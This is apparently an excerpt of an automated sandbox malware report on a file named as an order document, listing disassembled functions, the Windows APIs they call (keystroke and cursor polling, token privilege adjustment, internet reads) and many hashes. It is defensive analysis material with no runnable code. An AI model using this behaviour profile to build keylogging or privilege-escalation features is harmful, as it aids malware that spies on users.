Instruction ID: f4d4502bd19f39e4eae8a827b2e93a7102bde83d7ab60724816fa37c5e4c86a1
Opcode Fuzzy Hash: 7decc0964aa9a0c18d0d93d071e471d8afd33c0129de16156793592e0011829b
Instruction Fuzzy Hash: 9041DF306006019FD708DF29C4D1A9AB3E4FF49324F10456EEA5A8B3A1DB39B985CB99

Function 0041B63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(000000FF), ref: 0041B64F
ScreenToClient.USER32(00000000,000000FF), ref: 0041B66C
GetAsyncKeyState.USER32(00000001), ref: 0041B691
GetAsyncKeyState.USER32(00000002), ref: 0041B69F

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 43b026e8ddf3c15877f3b5ba52f636104edfffe8d0463ba332f451902e7bfc12
Instruction ID: 56377a556ccba115ed564bfe001a2c8afbd6a1a20169098259664232e43cb080
Opcode Fuzzy Hash: 43b026e8ddf3c15877f3b5ba52f636104edfffe8d0463ba332f451902e7bfc12
Instruction Fuzzy Hash: 3A417E31A04119BBCF159F65C844AEEBB74FF15324F10831BF82996290C739AD90DB9A

Function 00468111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00468160
IsWindowEnabled.USER32 ref: 0046816E
GetForegroundWindow.USER32(?,?,00000001), ref: 0046817B
IsIconic.USER32 ref: 00468189
IsZoomed.USER32 ref: 00468197

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: dbfed87c38ee92bf59b292af6f5fadc4ca6e903502444fd297db996fb690681f
Instruction ID: b914647029d33102a7cfa3aa289e3b8462c5c21d78575f5ca8fb078c54b4ff5d
Opcode Fuzzy Hash: dbfed87c38ee92bf59b292af6f5fadc4ca6e903502444fd297db996fb690681f
Instruction Fuzzy Hash: 0711E2317011146BE7212F26DC44EAF7799EF46720B04052FF849D3281EF78980386AE

Function 0041E01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0041E014,74DF0AE0,0041DEF1,0049DC38,?,?), ref: 0041E02C
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0041E03E

Strings

GetNativeSystemInfo, xrefs: 0041E038
kernel32.dll, xrefs: 0041E027

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: d4bcc8df34a69c75c0e0aef847fce7452e4d83df1b9fa05b59668c201de80aca
Instruction ID: d3a2d7f9251202634d31430f40abaa6068e993e0ea93885ba20427a44fa0b13a
Opcode Fuzzy Hash: d4bcc8df34a69c75c0e0aef847fce7452e4d83df1b9fa05b59668c201de80aca
Instruction Fuzzy Hash: 7BD05E348007229EC7215B62E9087977BD4AF04700F28482FE88192290D6F8D8808768

Function 0043B1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0043AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0043AA79
Part of subcall function 0043AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0043AA83
Part of subcall function 0043AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0043AA92
Part of subcall function 0043AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0043AA99
Part of subcall function 0043AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0043AAAF

GetLengthSid.ADVAPI32(?,00000000,0043ADE4,?,?), ref: 0043B21B
GetProcessHeap.KERNEL32(00000008,00000000), ref: 0043B227
HeapAlloc.KERNEL32(00000000), ref: 0043B22E
CopySid.ADVAPI32(?,00000000,?), ref: 0043B247

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
String ID:
API String ID: 4217664535-0
Opcode ID: 4498dd891bef3c073dae90eee2635492a466a612a2df3ba819a3a2bd57d1623d
Instruction ID: 573796cad2db7ff1302e17eb1794f716ba6f0da4f155cbbcd395141fd52a3640
Opcode Fuzzy Hash: 4498dd891bef3c073dae90eee2635492a466a612a2df3ba819a3a2bd57d1623d
Instruction Fuzzy Hash: BD11BF71A00205AFDB049F94DC88FAFB7B9EF89318F14946FEA4297250D739AE44CB54

Function 0041B11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON

Download Yara Rule

APIs

Part of subcall function 0041B34E: GetWindowLongW.USER32(?,000000EB), ref: 0041B35F

DefDlgProcW.USER32(?,?,?,?,?), ref: 0041B22F

Part of subcall function 0041B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0041B5A5

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Proc$LongWindow
String ID:
API String ID: 2749884682-0
Opcode ID: 7cf0e01d325c05872215fadf7fd1876a518e877bd8c73a3ee908c1b70c179c08
Instruction ID: 2271108539b8a3bcad80f9fb504b99785085641c9eb99831aee7754bc93f6997
Opcode Fuzzy Hash: 7cf0e01d325c05872215fadf7fd1876a518e877bd8c73a3ee908c1b70c179c08
Instruction Fuzzy Hash: FBA14C70114105BAD7246B2B9C4CDFF295CEB4A348B14829FF845D6292DB3C9C8692FF

Function 00454EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,004543BF,00000000), ref: 00454FA6
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00454FD2

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: b3b3a90c23168b91d967b868aba84b9d364afaca1416a805006fe33dafa1270d
Instruction ID: fc2494c5d1090c68671fb56a484849f12dd1ab69f199119c895c0e360fce0958
Opcode Fuzzy Hash: b3b3a90c23168b91d967b868aba84b9d364afaca1416a805006fe33dafa1270d
Instruction Fuzzy Hash: 5541FA72604205BFEB10DE85DC81EBF77BCEB8071EF10402FFA0566182D6799E89D668

Function 0044E1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0044E20D
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0044E267
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0044E2B4

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: aafbfce44185f70870d8afe07bf37bb2e422d67a6981e374a3d90d68d9f72eff
Instruction ID: fcb039aee163e110a326b73cd7f822dd4e4f4f3e0c392ce8ae1e703b4088fde6
Opcode Fuzzy Hash: aafbfce44185f70870d8afe07bf37bb2e422d67a6981e374a3d90d68d9f72eff
Instruction Fuzzy Hash: 46219D35A00118EFDB00EFA5D884EEDBBB8FF48314F0484AAE905E7391DB359905CB58

Function 0043B134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0041F4EA: std::exception::exception.LIBCMT ref: 0041F51E
Part of subcall function 0041F4EA: __CxxThrowException@8.LIBCMT ref: 0041F533

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0043B180
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0043B1AD
GetLastError.KERNEL32 ref: 0043B1BA

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: ee2bafe8e02b36d905e7548b02efa8f81da9ee796925be9efc932596bd8f7e1c
Instruction ID: d34e02cad222c35508b3879b7c877537743fe1e9ff263f18776d04d4c75f896d
Opcode Fuzzy Hash: ee2bafe8e02b36d905e7548b02efa8f81da9ee796925be9efc932596bd8f7e1c
Instruction Fuzzy Hash: E611C1B1900204AFE7189F54DCC5D6BB7BDFB48354B20892EF45697241DB74FC428B64

Function 004471FA Relevance: 4.5, APIs: 3, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00447223
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0044723A
FreeSid.ADVAPI32(?), ref: 0044724A

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: c31be835109406b49b1e5b9f6e5b02849ad6eb7177ad8e108ba26c0d5b9f8f92
Instruction ID: 57aeaf038d2452313bcdb42708262a1761e9db82bc135c3fee38054b2013e197
Opcode Fuzzy Hash: c31be835109406b49b1e5b9f6e5b02849ad6eb7177ad8e108ba26c0d5b9f8f92
Instruction Fuzzy Hash: 3FF01D76E05309BFDF04DFE4DD89AEEBBB8FF09205F504869A602E21D1E3749A449B14

Function 0044F56F Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0044F599
FindClose.KERNEL32(00000000), ref: 0044F5C9

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: f5ed6886b2520a8fc29f1761c1adbfca9a54a527dae0a705951b44cad1029618
Instruction ID: f1cd61f13b4ef61f2258d90b24d8a70c52a44234eaa919de3b45e9d4c70e834c
Opcode Fuzzy Hash: f5ed6886b2520a8fc29f1761c1adbfca9a54a527dae0a705951b44cad1029618
Instruction Fuzzy Hash: BF11C4316002009FD700EF29D849A2EB3E9FF84324F00892EF9A5D73D1DB74AD058B89

Function 0044CE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0045BE6A,?,?,00000000,?), ref: 0044CEA7
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0045BE6A,?,?,00000000,?), ref: 0044CEB9

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: e20ee315e4ec0e37730c00e99d2333a3c1edbc1e9039d31910fb98ae936f0a6e
Instruction ID: 38b4f1614884c6b466561351100e4d6413efc0af59102ccdb8bb2b0083ef7f16
Opcode Fuzzy Hash: e20ee315e4ec0e37730c00e99d2333a3c1edbc1e9039d31910fb98ae936f0a6e
Instruction Fuzzy Hash: 2CF0E231501229EBEB10EBA0DC88FEA736CBF08360F00416AF805D2181D7349A00CBA4

Function 0044411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00444153
keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00444166

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 785ef674d997d1a47d6e4a754bfc41e7bbea513b7be5b679f220edb18d586ab5
Instruction ID: fbbd680bab7d3c56282e5d27e33836289a13848d61ac285d335470ecaf5d92a6
Opcode Fuzzy Hash: 785ef674d997d1a47d6e4a754bfc41e7bbea513b7be5b679f220edb18d586ab5
Instruction Fuzzy Hash: CEF0307090434DAFEB059FA4C809BBE7FB4EF04305F04841AF96696191D779C616DFA4

Function 0043AB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000), ref: 0043AB99
CloseHandle.KERNEL32(?), ref: 0043ABAB

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 230adf680d109f85d0bc0309ea1f1aad25d48a23c798c6acaff7dd1004d355d0
Instruction ID: d05ca891511b1101e5b1e2ebcce66da84dd88e23b38a4ffdf4c9dfd1041b73b0
Opcode Fuzzy Hash: 230adf680d109f85d0bc0309ea1f1aad25d48a23c798c6acaff7dd1004d355d0
Instruction Fuzzy Hash: CEE0BF71000510AFE7252F55EC05DB7B7AAEB04324B10882EB99981471D7666C95AB54

Function 004281AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00426DB3,-0000031A,?,?,00000001), ref: 004281B1
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 004281BA

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 78bf435161179bd1ba802f90e724f00a28127df4a5bafb0e6b0ba1f8f28ab746
Instruction ID: cb4d899765201692ad32a28ec14761de77d0b6c524f12578595b3ebc96636b9c
Opcode Fuzzy Hash: 78bf435161179bd1ba802f90e724f00a28127df4a5bafb0e6b0ba1f8f28ab746
Instruction Fuzzy Hash: AEB09231445608ABDB002BA1EC09B5C7F68EB08652F004438FA0D440A18B7254109B9A

Function 0042D1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c728a019a251dc71abe01092ac8050e92b83019d64a38dfaf4092ab5920baa3
Instruction ID: 9386638fda9fd413a2794a4d8da2c2628334511d74af6c625826b4761eb94a98
Opcode Fuzzy Hash: 5c728a019a251dc71abe01092ac8050e92b83019d64a38dfaf4092ab5920baa3
Instruction Fuzzy Hash: FE323672E29F114DD7239634D922336A288AFB73D4F55D737F819B5AAAEB28C4C34104

Function 004096C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693152715.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693295136.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693358319.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693576908.0000000000597000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693614693.00000000005A1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order SMG 201906 20190816order.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: 2891b928adbbb4b532b87671f2730252573381adecebc0b1a8f210ad163ad886
Instruction ID: 44eb92a974ec04ae678a45c2a6fc85566987a502e803283e11ac4ed19b42c345
Opcode Fuzzy Hash: 2891b928adbbb4b532b87671f2730252573381adecebc0b1a8f210ad163ad886
Instruction Fuzzy Hash: E622A1716083019FD724DF15C480B9BB7E4AF84314F14892EF89AA7291DB79ED45CB8A

Function 0043038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1693035661.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1693001186.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
